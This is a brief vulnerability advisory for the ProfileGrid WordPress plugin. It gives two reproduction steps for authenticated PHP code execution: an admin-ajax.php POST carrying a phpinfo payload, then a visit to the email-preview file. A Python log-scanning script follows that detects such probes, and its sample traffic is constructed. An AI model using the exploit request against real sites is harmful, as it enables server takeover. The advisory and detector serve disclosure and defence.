Versions of the ProfileGrid – User Profiles, Groups and Communities plugin prior to 2.8.6 are vulnerable to Arbitrary Code Execution. An authenticated user with a role as low as Subscriber can execute arbitrary PHP code on websites using the plugin.
Send an authenticated POST request to wp-admin/admin-ajax.php with parameters action=pm_template_preview&html=<?php phpinfo();
Visit wp-content/plugins/profilegrid-user-profiles-groups-and-communities/admin/partials/email-preview.php
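To check whether a site was probed this way, the following added example (not part of the advisory or the plugin) scans web access logs for requests to the preview file and notes whether the same client POSTed to admin-ajax.php shortly before. It assumes the Apache/nginx combined log format; the 10-minute window, the function names and the sample lines are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Paths named in the advisory. Every request to PREVIEW is reported for review.
PREVIEW = ("/wp-content/plugins/profilegrid-user-profiles-groups-and-communities"
           "/admin/partials/email-preview.php")
AJAX = "/wp-admin/admin-ajax.php"
WINDOW = timedelta(minutes=10)  # assumption: correlation window, tune per site

# Apache/nginx "combined" access-log format (assumed).
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) ')

def parse(line):
    m = LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    path = m["uri"].split("?", 1)[0]  # drop the query string
    return m["ip"], ts, m["method"], path, int(m["status"])

def find_suspects(lines):
    """Return (ip, time, status, correlated) for each request to PREVIEW.
    correlated is True when the same client POSTed to admin-ajax.php within
    WINDOW beforehand. POST parameters are normally sent in the request body,
    which access logs do not record, so this is a triage hint, not proof.
    """
    last_ajax_post = {}  # ip -> time of most recent POST to admin-ajax.php
    hits = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if method == "POST" and path.endswith(AJAX):
            last_ajax_post[ip] = ts
        elif path.endswith(PREVIEW):
            prev = last_ajax_post.get(ip)
            correlated = prev is not None and timedelta(0) <= ts - prev <= WINDOW
            hits.append((ip, ts.isoformat(), status, correlated))
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    f'203.0.113.7 - - [12/Mar/2021:10:01:02 +0000] "POST {AJAX} HTTP/1.1" 200 12 "-" "-"',
    f'203.0.113.7 - - [12/Mar/2021:10:01:09 +0000] "GET {PREVIEW} HTTP/1.1" 200 8421 "-" "-"',
    f'198.51.100.4 - - [12/Mar/2021:10:05:00 +0000] "POST {AJAX} HTTP/1.1" 200 58 "-" "-"',
    f'192.0.2.9 - - [12/Mar/2021:11:00:00 +0000] "GET /blog{PREVIEW}?x=1 HTTP/1.1" 404 153 "-" "-"',
]
```

Pass an open log file to find_suspects() in place of SAMPLE. The path match uses endswith so that WordPress installs in a subdirectory are also covered.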